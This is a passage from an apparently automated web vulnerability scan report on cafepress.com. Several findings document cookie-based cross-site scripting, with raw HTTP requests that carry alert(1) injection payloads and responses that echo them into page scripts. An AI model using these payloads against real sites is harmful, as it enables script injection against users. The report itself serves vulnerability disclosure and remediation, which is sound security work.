GET /+bags HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=91e0a</script><script>alert(1)</script>2ef0362a154 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; 
__cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59583 Date: Sun, 26 Dec 2010 13:47:16 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/ Set-Cookie: cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59583 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '91e0a</script><script>alert(1)</script>2ef0362a154 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.18. http://www.cafepress.com/+boxers [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+boxers
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload baa43"-alert(1)-"4cc6f92795 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+boxers HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAbaa43"-alert(1)-"4cc6f92795 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 59461 Date: Sun, 26 Dec 2010 13:47:31 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:31 GMT; path=/ Set-Cookie: cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:31 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59461 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAbaa43"-alert(1)-"4cc6f92795 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.19. http://www.cafepress.com/+boxers [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+boxers
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6727</script><script>alert(1)</script>52729b93123 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+boxers HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=d6727</script><script>alert(1)</script>52729b93123 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 59479 Date: Sun, 26 Dec 2010 13:47:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:26 GMT; path=/ Set-Cookie: cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:26 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59479 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'd6727</script><script>alert(1)</script>52729b93123 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.20. http://www.cafepress.com/+bumper-stickers [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+bumper-stickers
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 350cc"-alert(1)-"5204568fc11 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+bumper-stickers HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA350cc"-alert(1)-"5204568fc11 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 59754 Date: Sun, 26 Dec 2010 13:48:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:56 GMT; path=/ Set-Cookie: cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:56 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59754 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA350cc"-alert(1)-"5204568fc11 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.21. http://www.cafepress.com/+bumper-stickers [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+bumper-stickers
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 144cb</script><script>alert(1)</script>4632a294b1c was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+bumper-stickers HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=144cb</script><script>alert(1)</script>4632a294b1c ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59771 Date: Sun, 26 Dec 2010 13:48:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:55 GMT; path=/ Set-Cookie: cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:55 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59771 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '144cb</script><script>alert(1)</script>4632a294b1c ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.22. http://www.cafepress.com/+buttons [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+buttons
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e64e3"-alert(1)-"4f4360aac81 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+buttons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
